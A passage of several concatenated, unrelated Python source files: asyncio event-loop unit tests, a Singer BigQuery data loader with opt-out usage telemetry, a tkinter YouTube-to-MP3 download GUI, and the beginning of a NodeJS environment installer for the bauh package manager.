class SelectEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.SelectSelector())
def noop(*args, **kwargs):
pass
class HandleTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
self.loop.get_debug.return_value = True
def test_handle(self):
def callback(*args):
return args
args = ()
h = asyncio.Handle(callback, args, self.loop)
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
h.cancel()
self.assertTrue(h.cancelled())
def test_callback_with_exception(self):
def callback():
raise ValueError()
self.loop = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
h = asyncio.Handle(callback, (), self.loop)
h._run()
self.loop.call_exception_handler.assert_called_with({
'message': test_utils.MockPattern('Exception in callback.*'),
'exception': mock.ANY,
'handle': h,
'source_traceback': h._source_traceback,
})
def test_handle_weakref(self):
wd = weakref.WeakValueDictionary()
h = asyncio.Handle(lambda: None, (), self.loop)
wd['h'] = h # Would fail without __weakref__ slot.
def test_handle_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s>'
% (filename, lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<Handle cancelled>')
# decorated function
with self.assertWarns(DeprecationWarning):
cb = asyncio.coroutine(noop)
h = asyncio.Handle(cb, (), self.loop)
self.assertEqual(repr(h),
'<Handle noop() at %s:%s>'
% (filename, lineno))
# partial function
cb = functools.partial(noop, 1, 2)
h = asyncio.Handle(cb, (3,), self.loop)
regex = (r'^<Handle noop\(1, 2\)\(3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial function with keyword args
cb = functools.partial(noop, x=1)
h = asyncio.Handle(cb, (2, 3), self.loop)
regex = (r'^<Handle noop\(x=1\)\(2, 3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial method
if sys.version_info >= (3, 4):
method = HandleTests.test_handle_repr
cb = functools.partialmethod(method)
filename, lineno = test_utils.get_function_source(method)
h = asyncio.Handle(cb, (), self.loop)
cb_regex = r'<function HandleTests.test_handle_repr .*>'
cb_regex = (r'functools.partialmethod\(%s, , \)\(\)' % cb_regex)
regex = (r'^<Handle %s at %s:%s>$'
% (cb_regex, re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
def test_handle_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# double cancellation won't overwrite _repr
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_handle_source_traceback(self):
loop = asyncio.get_event_loop_policy().new_event_loop()
loop.set_debug(True)
self.set_event_loop(loop)
def check_source_traceback(h):
lineno = sys._getframe(1).f_lineno - 1
self.assertIsInstance(h._source_traceback, list)
self.assertEqual(h._source_traceback[-1][:3],
(__file__,
lineno,
'test_handle_source_traceback'))
# call_soon
h = loop.call_soon(noop)
check_source_traceback(h)
# call_soon_threadsafe
h = loop.call_soon_threadsafe(noop)
check_source_traceback(h)
# call_later
h = loop.call_later(0, noop)
check_source_traceback(h)
# call_at
h = loop.call_later(0, noop)
check_source_traceback(h)
@unittest.skipUnless(hasattr(collections.abc, 'Coroutine'),
'No collections.abc.Coroutine')
def test_coroutine_like_object_debug_formatting(self):
# Test that asyncio can format coroutines that are instances of
# collections.abc.Coroutine, but lack cr_core or gi_code attributes
# (such as ones compiled with Cython).
coro = CoroLike()
coro.__name__ = 'AAA'
self.assertTrue(asyncio.iscoroutine(coro))
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
coro.__qualname__ = 'BBB'
self.assertEqual(coroutines._format_coroutine(coro), 'BBB()')
coro.cr_running = True
self.assertEqual(coroutines._format_coroutine(coro), 'BBB() running')
coro.__name__ = coro.__qualname__ = None
self.assertEqual(coroutines._format_coroutine(coro),
'<CoroLike without __name__>() running')
coro = CoroLike()
coro.__qualname__ = 'CoroLike'
# Some coroutines might not have '__name__', such as
# built-in async_gen.asend().
self.assertEqual(coroutines._format_coroutine(coro), 'CoroLike()')
coro = CoroLike()
coro.__qualname__ = 'AAA'
coro.cr_code = None
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
class TimerTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
def test_hash(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(hash(h), hash(when))
def test_when(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(when, h.when())
def test_timer(self):
def callback(*args):
return args
args = (1, 2, 3)
when = time.monotonic()
h = asyncio.TimerHandle(when, callback, args, mock.Mock())
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
# cancel
h.cancel()
self.assertTrue(h.cancelled())
self.assertIsNone(h._callback)
self.assertIsNone(h._args)
# when cannot be None
self.assertRaises(AssertionError,
asyncio.TimerHandle, None, callback, args,
self.loop)
def test_timer_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.TimerHandle(123, noop, (), self.loop)
src = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() at %s:%s>' % src)
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123>')
def test_timer_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.TimerHandle(123, noop, (), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_timer_comparison(self):
def callback(*args):
return args
when = time.monotonic()
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when, callback, (), self.loop)
# TODO: Use assertLess etc.
self.assertFalse(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertTrue(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertFalse(h2 > h1)
self.assertTrue(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertTrue(h1 == h2)
self.assertFalse(h1 != h2)
h2.cancel()
self.assertFalse(h1 == h2)
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when + 10.0, callback, (), self.loop)
self.assertTrue(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertFalse(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertTrue(h2 > h1)
self.assertFalse(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertFalse(h1 == h2)
self.assertTrue(h1 != h2)
h3 = asyncio.Handle(callback, (), self.loop)
self.assertIs(NotImplemented, h1.__eq__(h3))
self.assertIs(NotImplemented, h1.__ne__(h3))
class AbstractEventLoopTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
self.assertRaises(
NotImplementedError, loop.run_forever)
self.assertRaises(
NotImplementedError, loop.run_until_complete, None)
self.assertRaises(
NotImplementedError, loop.stop)
self.assertRaises(
NotImplementedError, loop.is_running)
self.assertRaises(
NotImplementedError, loop.is_closed)
self.assertRaises(
NotImplementedError, loop.close)
self.assertRaises(
NotImplementedError, loop.create_task, None)
self.assertRaises(
NotImplementedError, loop.call_later, None, None)
self.assertRaises(
NotImplementedError, loop.call_at, f, f)
self.assertRaises(
NotImplementedError, loop.call_soon, None)
self.assertRaises(
NotImplementedError, loop.time)
self.assertRaises(
NotImplementedError, loop.call_soon_threadsafe, None)
self.assertRaises(
NotImplementedError, loop.set_default_executor, f)
self.assertRaises(
NotImplementedError, loop.add_reader, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_reader, 1)
self.assertRaises(
NotImplementedError, loop.add_writer, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_writer, 1)
self.assertRaises(
NotImplementedError, loop.add_signal_handler, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.set_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.default_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.call_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.get_debug)
self.assertRaises(
NotImplementedError, loop.set_debug, f)
def test_not_implemented_async(self):
async def inner():
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
with self.assertRaises(NotImplementedError):
await loop.run_in_executor(f, f)
with self.assertRaises(NotImplementedError):
await loop.getaddrinfo('localhost', 8080)
with self.assertRaises(NotImplementedError):
await loop.getnameinfo(('localhost', 8080))
with self.assertRaises(NotImplementedError):
await loop.create_connection(f)
with self.assertRaises(NotImplementedError):
await loop.create_server(f)
with self.assertRaises(NotImplementedError):
await loop.create_datagram_endpoint(f)
with self.assertRaises(NotImplementedError):
await loop.sock_recv(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_recv_into(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_sendall(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_connect(f, f)
with self.assertRaises(NotImplementedError):
await loop.sock_accept(f)
with self.assertRaises(NotImplementedError):
await loop.sock_sendfile(f, f)
with self.assertRaises(NotImplementedError):
await loop.sendfile(f, f)
with self.assertRaises(NotImplementedError):
await loop.connect_read_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.connect_write_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.subprocess_shell(f, mock.sentinel)
with self.assertRaises(NotImplementedError):
await loop.subprocess_exec(f)
loop = asyncio.new_event_loop()
loop.run_until_complete(inner())
loop.close()
class PolicyTests(unittest.TestCase):
def test_event_loop_policy(self):
policy = asyncio.AbstractEventLoopPolicy()
self.assertRaises(NotImplementedError, policy.get_event_loop)
self.assertRaises(NotImplementedError, policy.set_event_loop, object())
self.assertRaises(NotImplementedError, policy.new_event_loop)
self.assertRaises(NotImplementedError, policy.get_child_watcher)
self.assertRaises(NotImplementedError, policy.set_child_watcher,
object())
def test_get_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
self.assertIsNone(policy._local._loop)
loop = policy.get_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
self.assertIs(policy._local._loop, loop)
self.assertIs(loop, policy.get_event_loop())
loop.close()
def test_get_event_loop_calls_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
with mock.patch.object(
policy, "set_event_loop",
wraps=policy.set_event_loop) as m_set_event_loop:
loop = policy.get_event_loop()
# policy._local._loop must be set through .set_event_loop()
# (the unix DefaultEventLoopPolicy needs this call to attach
# the child watcher correctly)
m_set_event_loop.assert_called_with(loop)
loop.close()
def test_get_event_loop_after_set_none(self):
policy = asyncio.DefaultEventLoopPolicy()
policy.set_event_loop(None)
self.assertRaises(RuntimeError, policy.get_event_loop)
@mock.patch('asyncio.events.threading.current_thread')
def test_get_event_loop_thread(self, m_current_thread):
def f():
policy = asyncio.DefaultEventLoopPolicy()
self.assertRaises(RuntimeError, policy.get_event_loop)
th = threading.Thread(target=f)
th.start()
th.join()
def test_new_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
loop = policy.new_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
loop.close()
def test_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
old_loop = policy.get_event_loop()
self.assertRaises(AssertionError, policy.set_event_loop, object())
loop = policy.new_event_loop()
policy.set_event_loop(loop)
self.assertIs(loop, policy.get_event_loop())
self.assertIsNot(old_loop, policy.get_event_loop())
loop.close()
old_loop.close()
def test_get_event_loop_policy(self):
policy = asyncio.get_event_loop_policy()
self.assertIsInstance(policy, asyncio.AbstractEventLoopPolicy)
self.assertIs(policy, asyncio.get_event_loop_policy())
def test_set_event_loop_policy(self):
self.assertRaises(
AssertionError, asyncio.set_event_loop_policy, object())
old_policy = asyncio.get_event_loop_policy()
policy = asyncio.DefaultEventLoopPolicy()
asyncio.set_event_loop_policy(policy)
self.assertIs(policy, asyncio.get_event_loop_policy())
self.assertIsNot(policy, old_policy)
class GetEventLoopTestsMixin:
_get_running_loop_impl = None
_set_running_loop_impl = None
get_running_loop_impl = None
get_event_loop_impl = None
def setUp(self):
self._get_running_loop_saved = events._get_running_loop
self._set_running_loop_saved = events._set_running_loop
self.get_running_loop_saved = events.get_running_loop
self.get_event_loop_saved = events.get_event_loop
events._get_running_loop = type(self)._get_running_loop_impl
events._set_running_loop = type(self)._set_running_loop_impl
events.get_running_loop = type(self).get_running_loop_impl
events.get_event_loop = type(self).get_event_loop_impl
asyncio._get_running_loop = type(self)._get_running_loop_impl
asyncio._set_running_loop = type(self)._set_running_loop_impl
asyncio.get_running_loop = type(self).get_running_loop_impl
asyncio.get_event_loop = type(self).get_event_loop_impl
super().setUp()
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
if sys.platform != 'win32':
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
try:
if sys.platform != 'win32':
asyncio.set_child_watcher(None)
super().tearDown()
finally:
self.loop.close()
asyncio.set_event_loop(None)
events._get_running_loop = self._get_running_loop_saved
events._set_running_loop = self._set_running_loop_saved
events.get_running_loop = self.get_running_loop_saved
events.get_event_loop = self.get_event_loop_saved
asyncio._get_running_loop = self._get_running_loop_saved
asyncio._set_running_loop = self._set_running_loop_saved
asyncio.get_running_loop = self.get_running_loop_saved
asyncio.get_event_loop = self.get_event_loop_saved
if sys.platform != 'win32':
def test_get_event_loop_new_process(self):
# bpo-32126: The multiprocessing module used by
# ProcessPoolExecutor is not functional when the
# multiprocessing.synchronize module cannot be imported.
support.skip_if_broken_multiprocessing_synchronize()
async def main():
pool = concurrent.futures.ProcessPoolExecutor()
result = await self.loop.run_in_executor(
pool, _test_get_event_loop_new_process__sub_proc)
pool.shutdown()
return result
self.assertEqual(
self.loop.run_until_complete(main()),
'hello')
def test_get_event_loop_returns_running_loop(self):
class TestError(Exception):
pass
class Policy(asyncio.DefaultEventLoopPolicy):
def get_event_loop(self):
raise TestError
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(Policy())
loop = asyncio.new_event_loop()
with self.assertRaises(TestError):
asyncio.get_event_loop()
asyncio.set_event_loop(None)
with self.assertRaises(TestError):
asyncio.get_event_loop()
with self.assertRaisesRegex(RuntimeError, 'no running'):
self.assertIs(asyncio.get_running_loop(), None)
self.assertIs(asyncio._get_running_loop(), None)
async def func():
self.assertIs(asyncio.get_event_loop(), loop)
self.assertIs(asyncio.get_running_loop(), loop)
self.assertIs(asyncio._get_running_loop(), loop)
loop.run_until_complete(func())
asyncio.set_event_loop(loop)
with self.assertRaises(TestError):
asyncio.get_event_loop()
asyncio.set_event_loop(None)
with self.assertRaises(TestError):
asyncio.get_event_loop()
finally:
asyncio.set_event_loop_policy(old_policy)
if loop is not None:
loop.close()
with self.assertRaisesRegex(RuntimeError, 'no running'):
self.assertIs(asyncio.get_running_loop(), None)
self.assertIs(asyncio._get_running_loop(), None)
class TestPyGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._py__get_running_loop
_set_running_loop_impl = events._py__set_running_loop
get_running_loop_impl = events._py_get_running_loop
get_event_loop_impl = events._py_get_event_loop
try:
import _asyncio # NoQA
except ImportError:
pass
else:
class TestCGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._c__get_running_loop
_set_running_loop_impl = events._c__set_running_loop
get_running_loop_impl = events._c_get_running_loop
get_event_loop_impl = events._c_get_event_loop
class TestServer(unittest.TestCase):
def test_get_loop(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
proto = MyProto(loop)
server = loop.run_until_complete(loop.create_server(lambda: proto, '0.0.0.0', 0))
self.assertEqual(server.get_loop(), loop)
server.close()
loop.run_until_complete(server.wait_closed())
class TestAbstractServer(unittest.TestCase):
def test_close(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().close()
def test_wait_closed(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
with self.assertRaises(NotImplementedError):
loop.run_until_complete(events.AbstractServer().wait_closed())
def test_get_loop(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().get_loop()
if __name__ == '__main__':
unittest.main()
|
target_bigquery.py
|
#!/usr/bin/env python3
import argparse
import io
import sys
import json
import logging
import collections
import threading
import http.client
import urllib
import pkg_resources
from jsonschema import validate
import singer
from oauth2client import tools
from tempfile import TemporaryFile
from google.cloud import bigquery
from google.cloud.bigquery.job import SourceFormat
from google.cloud.bigquery import Dataset, WriteDisposition
from google.cloud.bigquery import SchemaField
from google.cloud.bigquery import LoadJobConfig
from google.api_core import exceptions
try:
parser = argparse.ArgumentParser(parents=[tools.argparser])
parser.add_argument('-c', '--config', help='Config file', required=True)
flags = parser.parse_args()
except ImportError:
flags = None
logging.getLogger('googleapiclient.discovery_cache').setLevel(logging.ERROR)
logger = singer.get_logger()
SCOPES = ['https://www.googleapis.com/auth/bigquery','https://www.googleapis.com/auth/bigquery.insertdata']
CLIENT_SECRET_FILE = 'client_secret.json'
APPLICATION_NAME = 'Singer BigQuery Target'
StreamMeta = collections.namedtuple('StreamMeta', ['schema', 'key_properties', 'bookmark_properties'])
def emit_state(state):
if state is not None:
line = json.dumps(state)
logger.debug('Emitting state {}'.format(line))
sys.stdout.write("{}\n".format(line))
sys.stdout.flush()
def clear_dict_hook(items):
return {k: v if v is not None else '' for k, v in items}
def define_schema(field, name):
schema_name = name
schema_type = "STRING"
schema_mode = "NULLABLE"
schema_description = None
schema_fields = ()
if 'type' not in field and 'anyOf' in field:
for types in field['anyOf']:
if types['type'] == 'null':
schema_mode = 'NULLABLE'
else:
field = types
if isinstance(field['type'], list):
if field['type'][0] == "null":
schema_mode = 'NULLABLE'
else:
schema_mode = 'required'
if len(field['type']) > 1:
schema_type = field['type'][1]
else:
schema_type = field['type'][0]
else:
schema_type = field['type']
if schema_type == "object":
schema_type = "RECORD"
schema_fields = tuple(build_schema(field))
if schema_type == "array":
schema_type = field.get('items').get('type')
if isinstance(schema_type, list):
schema_type = schema_type[-1]
schema_mode = "REPEATED"
if schema_type == "object":
schema_type = "RECORD"
schema_fields = tuple(build_schema(field.get('items')))
if schema_type == "string":
if "format" in field:
if field['format'] == "date-time":
schema_type = "timestamp"
if schema_type == 'number':
schema_type = 'FLOAT'
return (schema_name, schema_type, schema_mode, schema_description, schema_fields)
def build_schema(schema):
SCHEMA = []
for key in schema['properties'].keys():
if not (bool(schema['properties'][key])):
# if we endup with an empty record.
continue
schema_name, schema_type, schema_mode, schema_description, schema_fields = define_schema(schema['properties'][key], key)
SCHEMA.append(SchemaField(schema_name, schema_type, schema_mode, schema_description, schema_fields))
return SCHEMA
def persist_lines_job(project_id, dataset_id, lines=None, truncate=False, validate_records=True):
state = None
schemas = {}
key_properties = {}
tables = {}
rows = {}
errors = {}
bigquery_client = bigquery.Client(project=project_id)
# try:
# dataset = bigquery_client.create_dataset(Dataset(dataset_ref)) or Dataset(dataset_ref)
# except exceptions.Conflict:
# pass
for line in lines:
try:
msg = singer.parse_message(line)
except json.decoder.JSONDecodeError:
logger.error("Unable to parse:\n{}".format(line))
raise
if isinstance(msg, singer.RecordMessage):
if msg.stream not in schemas:
raise Exception("A record for stream {} was encountered before a corresponding schema".format(msg.stream))
schema = schemas[msg.stream]
if validate_records:
validate(msg.record, schema)
# NEWLINE_DELIMITED_JSON expects literal JSON formatted data, with a newline character splitting each row.
dat = bytes(json.dumps(msg.record) + '\n', 'UTF-8')
rows[msg.stream].write(dat)
#rows[msg.stream].write(bytes(str(msg.record) + '\n', 'UTF-8'))
state = None
elif isinstance(msg, singer.StateMessage):
logger.debug('Setting state to {}'.format(msg.value))
state = msg.value
elif isinstance(msg, singer.SchemaMessage):
table = msg.stream
schemas[table] = msg.schema
key_properties[table] = msg.key_properties
#tables[table] = bigquery.Table(dataset.table(table), schema=build_schema(schemas[table]))
rows[table] = TemporaryFile(mode='w+b')
errors[table] = None
# try:
# tables[table] = bigquery_client.create_table(tables[table])
# except exceptions.Conflict:
# pass
elif isinstance(msg, singer.ActivateVersionMessage):
# This is experimental and won't be used yet
pass
else:
raise Exception("Unrecognized message {}".format(msg))
for table in rows.keys():
table_ref = bigquery_client.dataset(dataset_id).table(table)
SCHEMA = build_schema(schemas[table])
load_config = LoadJobConfig()
load_config.schema = SCHEMA
load_config.source_format = SourceFormat.NEWLINE_DELIMITED_JSON
if truncate:
load_config.write_disposition = WriteDisposition.WRITE_TRUNCATE
rows[table].seek(0)
logger.info("loading {} to Bigquery.\n".format(table))
load_job = bigquery_client.load_table_from_file(
rows[table], table_ref, job_config=load_config)
logger.info("loading job {}".format(load_job.job_id))
logger.info(load_job.result())
# for table in errors.keys():
# if not errors[table]:
# print('Loaded {} row(s) into {}:{}'.format(rows[table], dataset_id, table), tables[table].path)
# else:
# print('Errors:', errors[table], sep=" ")
return state
def persist_lines_stream(project_id, dataset_id, lines=None, validate_records=True):
state = None
schemas = {}
key_properties = {}
tables = {}
rows = {}
errors = {}
bigquery_client = bigquery.Client(project=project_id)
dataset_ref = bigquery_client.dataset(dataset_id)
dataset = Dataset(dataset_ref)
try:
dataset = bigquery_client.create_dataset(Dataset(dataset_ref)) or Dataset(dataset_ref)
except exceptions.Conflict:
pass
for line in lines:
try:
msg = singer.parse_message(line)
except json.decoder.JSONDecodeError:
logger.error("Unable to parse:\n{}".format(line))
raise
if isinstance(msg, singer.RecordMessage):
if msg.stream not in schemas:
raise Exception("A record for stream {} was encountered before a corresponding schema".format(msg.stream))
schema = schemas[msg.stream]
if validate_records:
validate(msg.record, schema)
errors[msg.stream] = bigquery_client.insert_rows_json(tables[msg.stream], [msg.record])
rows[msg.stream] += 1
state = None
elif isinstance(msg, singer.StateMessage):
logger.debug('Setting state to {}'.format(msg.value))
state = msg.value
elif isinstance(msg, singer.SchemaMessage):
table = msg.stream
schemas[table] = msg.schema
key_properties[table] = msg.key_properties
tables[table] = bigquery.Table(dataset.table(table), schema=build_schema(schemas[table]))
rows[table] = 0
errors[table] = None
try:
tables[table] = bigquery_client.create_table(tables[table])
except exceptions.Conflict:
pass
elif isinstance(msg, singer.ActivateVersionMessage):
# This is experimental and won't be used yet
pass
else:
raise Exception("Unrecognized message {}".format(msg))
for table in errors.keys():
if not errors[table]:
logging.info('Loaded {} row(s) into {}:{}'.format(rows[table], dataset_id, table, tables[table].path))
emit_state(state)
else:
logging.error('Errors:', errors[table], sep=" ")
return state
def collect():
try:
version = pkg_resources.get_distribution('target-bigquery').version
conn = http.client.HTTPConnection('collector.singer.io', timeout=10)
conn.connect()
params = {
'e': 'se',
'aid': 'singer',
'se_ca': 'target-bigquery',
'se_ac': 'open',
'se_la': version,
}
conn.request('GET', '/i?' + urllib.parse.urlencode(params))
conn.getresponse()
conn.close()
except:
logger.debug('Collection request failed')
def main():
with open(flags.config) as input:
config = json.load(input)
if not config.get('disable_collection', False):
logger.info('Sending version information to stitchdata.com. ' +
'To disable sending anonymous usage data, set ' +
'the config parameter "disable_collection" to true')
threading.Thread(target=collect).start()
if config.get('replication_method') == 'FULL_TABLE':
truncate = True
else:
truncate = False
validate_records = config.get('validate_records', True)
input = io.TextIOWrapper(sys.stdin.buffer, encoding='utf-8')
if config.get('stream_data', True):
state = persist_lines_stream(config['project_id'], config['dataset_id'], input, validate_records=validate_records)
else:
state = persist_lines_job(config['project_id'], config['dataset_id'], input, truncate=truncate, validate_records=validate_records)
emit_state(state)
logger.debug("Exiting normally")
if __name__ == '__main__':
main()
|
app.py
|
import os, sys
from soundspider import SoundSpider
from time import sleep
import threading
import tkinter as tk
the_menu = False
class Application(tk.Frame):
def __init__(self, master=None):
super().__init__(master)
self.master = master
self.pack()
self.create_widgets()
def destroy(self):
try:
download_thread.quit()
except:
pass
self.destroy()
def create_widgets(self):
self.label_title = tk.Label(self,text="Download Youtube Urls to MP3.\nYou can also download playlists!")
self.label_title.pack(side="top")
self.downloadBtn = tk.Button(self,text="Download",command=self.onToggleDownload)
self.downloadBtn.pack(side="bottom")
self.url_label = tk.Label(self,text="Enter Youtube URL:")
self.url_label.pack(side="top")
self.url_entry = tk.Entry(self)
self.url_entry.pack(side="top")
self.dir_label = tk.Label(self,text="Enter download subfolder:")
self.dir_label.pack(side="top")
self.dir_entry = tk.Entry(self)
self.dir_entry.pack(side="top")
self.status_label = tk.Label(self,text="")
self.status_label.pack(side="bottom")
self.url_entry.bind_class("Entry", "<Button-3><ButtonRelease-3>", self.show_menu)
self.dir_entry.bind_class("Entry", "<Button-3><ButtonRelease-3>", self.show_menu)
def onToggleDownload(self):
status = "Downloading..."
self.status_label['text'] = status
self.downloadBtn['state'] = "disabled"
self.dir_entry['state'] = "disabled"
self.url_entry['state'] = "disabled"
## verbose?
# verbose = True
verbose = False
params = (self.url_entry,self.dir_entry,verbose, self.status_label, self.downloadBtn,self.url_entry,self.dir_entry,True)
download_thread = threading.Thread(target=SoundSpider.convert, args=params)
download_thread.start()
return
def make_menu(self,w):
global the_menu
the_menu = tk.Menu(w, tearoff=0)
the_menu.add_command(label="Cut")
the_menu.add_command(label="Copy")
the_menu.add_command(label="Paste")
def show_menu(self,e):
w = e.widget
the_menu.entryconfigure("Cut",
command=lambda: w.event_generate("<<Cut>>"))
the_menu.entryconfigure("Copy",
command=lambda: w.event_generate("<<Copy>>"))
the_menu.entryconfigure("Paste",
command=lambda: w.event_generate("<<Paste>>"))
the_menu.tk.call("tk_popup", the_menu, e.x_root, e.y_root)
root = tk.Tk()
app = Application(master=root)
app.make_menu(root)
app.master.title("RUFO MP3 FETCHER")
app.master.maxsize(400, 200)
app.master.geometry("400x200")
app.mainloop()
|
environment.py
|
import glob
import logging
import os
import shutil
import tarfile
import traceback
from datetime import datetime, timedelta
from pathlib import Path
from threading import Thread
from typing import Dict, List, Optional
import requests
import yaml
from bauh.api.abstract.download import FileDownloader
from bauh.api.abstract.handler import ProcessWatcher, TaskManager
from bauh.api.abstract.view import MessageType
from bauh.api.http import HttpClient
from bauh.commons import system
from bauh.commons.html import bold
from bauh.commons.system import SimpleProcess, ProcessHandler
from bauh.gems.web import ENV_PATH, NODE_DIR_PATH, NODE_BIN_PATH, NODE_MODULES_PATH, NATIVEFIER_BIN_PATH, \
ELECTRON_CACHE_DIR, URL_ENVIRONMENT_SETTINGS, NPM_BIN_PATH, NODE_PATHS, \
nativefier, ENVIRONMENT_SETTINGS_CACHED_FILE, ENVIRONMENT_SETTINGS_TS_FILE, get_icon_path
from bauh.gems.web.model import WebApplication
from bauh.view.util.translation import I18n
class EnvironmentComponent:
def __init__(self, id: str, name: str, size: str, version: str, url: str, update: bool = False, properties: Optional[dict] = None):
self.id = id
self.name = name
self.size = size
self.version = version
self.url = url
self.update = update
self.properties = properties
class EnvironmentUpdater:
def __init__(self, logger: logging.Logger, http_client: HttpClient, file_downloader: FileDownloader, i18n: I18n, taskman: Optional[TaskManager] = None):
self.logger = logger
self.file_downloader = file_downloader
self.i18n = i18n
self.http_client = http_client
self.task_read_settings_id = 'web_read_settings'
self.taskman = taskman
def _install_nodejs(self, version: str, version_url: str, watcher: ProcessWatcher) -> bool:
self.logger.info(f"Downloading NodeJS {version}: {version_url}")
tarf_path = f"{ENV_PATH}/{version_url.split('/')[-1]}"
downloaded = self.file_downloader.download(version_url, watcher=watcher, output_path=tarf_path, cwd=ENV_PATH)
if not downloaded:
self.logger.error(f"Could not download '{version_url}'. Aborting...")
return False
else:
try:
tf = tarfile.open(tarf_path)
tf.extractall(path=ENV_PATH)
extracted_file = f'{ENV_PATH}/{tf.getnames()[0]}'
if os.path.exists(NODE_DIR_PATH):
self.logger.info(f"Removing old NodeJS version installation dir -> {NODE_DIR_PATH}")
try:
shutil.rmtree(NODE_DIR_PATH)
except:
self.logger.error(f"Could not delete old NodeJS version dir -> {NODE_DIR_PATH}")
traceback.print_exc()
return False
try:
os.rename(extracted_file, NODE_DIR_PATH)
except:
self.logger.error(f"Could not rename the NodeJS version file {extracted_file} as {NODE_DIR_PATH}")
traceback.print_exc()
return False
if os.path.exists(NODE_MODULES_PATH):
self.logger.info(f'Deleting {NODE_MODULES_PATH}')
try:
shutil.rmtree(NODE_MODULES_PATH)
except:
self.logger.error(f"Could not delete the directory {NODE_MODULES_PATH}")
return False
return True
except:
self.logger.error(f'Could not extract {tarf_path}')
traceback.print_exc()
return False
finally:
if os.path.exists(tarf_path):
try:
os.remove(tarf_path)
except:
self.logger.error(f'Could not delete file {tarf_path}')
def check_node_installed(self, version: str) -> bool:
if not os.path.exists(NODE_DIR_PATH):
return False
else:
